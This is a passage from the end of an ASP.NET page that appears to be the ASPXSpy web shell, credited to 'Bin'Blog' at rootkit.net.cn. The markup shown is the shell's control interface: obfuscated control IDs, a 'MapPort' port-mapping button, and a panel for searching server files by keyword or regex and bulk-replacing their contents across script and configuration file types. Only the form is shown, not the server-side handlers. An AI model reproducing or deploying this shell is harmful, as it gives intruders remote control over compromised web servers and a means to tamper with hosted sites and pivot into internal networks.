2548. <tr align="center"><td colspan="5"><br/><asp:Button ID="FJE" CssClass="bt" runat="server" Text="MapPort" OnClick="wDZ"/> <asp:Button ID="giX" CssClass="bt" runat="server" Text="ClearAll" OnClick="vJNsE"/> <asp:Button ID="GFsm" CssClass="bt" runat="server" Text="Refresh" OnClick="tYoZ"/></td></tr></table></div>
2549. <%--Search--%>
2550. <div id="yhv" runat="server">
2551. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
2552. <tr align="center">
2553. <td style="width:20%" align="left">Keyword</td>
2554. <td style="width:60%" align="left"><textarea id="iaMKl" runat="server" class="area" style="width:100%" rows="4"></textarea></td>
2555. <td style="width:20%" align="left"><input type="checkbox" runat="server" id="rAQ" value="1"/> Use Regex</td>
2556. </tr>
2557. <tr align="center">
2558. <td style="width:20%" align="left">Replace As</td>
2559. <td style="width:60%" align="left"><textarea id="qPe" runat="server" class="area" style="width:100%" rows="4"></textarea></td>
2560. <td style="width:20%" align="left"><input type="checkbox" runat="server" id="YZw"/> Replace</td>
2561. </tr>
2562. <tr align="center">
2563. <td style="width:20%" align="left">Search FileType</td>
2564. <td style="width:60%" align="left"><input type="text" runat="server" class="input" id="UDLvA" style="width:100%" value="asp|asa|cer|cdx|aspx|asax|ascx|cs|jsp|php|txt|inc|ini|js|htm|html|xml|config"/></td>
2565. <td style="width:20%" align="left"><asp:DropDownList runat="server" ID="Ven" AutoPostBack="False" CssClass="list"><asp:ListItem Value="name">File Name</asp:ListItem><asp:ListItem Value="content" Selected="True">File Content</asp:ListItem></asp:DropDownList></td>
2566. </tr>
2567. <tr align="center">
2568. <td style="width:20%" align="left">Path</td>
2569. <td style="width:60%" align="left"><input type="text" class="input" id="NaLJ" runat="server" style="width:100%" /></td>
2570. <td style="width:20%" align="left"><asp:Button CssClass="bt" id="axy" runat="server" onclick="NBy" Text="Start" /></td>
2571. </tr>
2572. </table>
2573. <br/>
2574. <br/>
2575. <asp:Table ID="oJiym" runat="server" Width="100%" CellSpacing="0" >
2576. <asp:TableRow CssClass="head"><asp:TableCell Width="60%">File Path</asp:TableCell><asp:TableCell Width="20%">Last modified</asp:TableCell><asp:TableCell Width="20%">Size</asp:TableCell></asp:TableRow>
2577. </asp:Table>
2578. </div>
2579. </td></tr></table>
2580. <div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">Copyright &copy; 2006-2009 <a href="http://www.rootkit.net.cn" target="_blank">Bin'Blog</a> All Rights Reserved.</div></div>
2581. </form>
2582. </body>
2583. </html>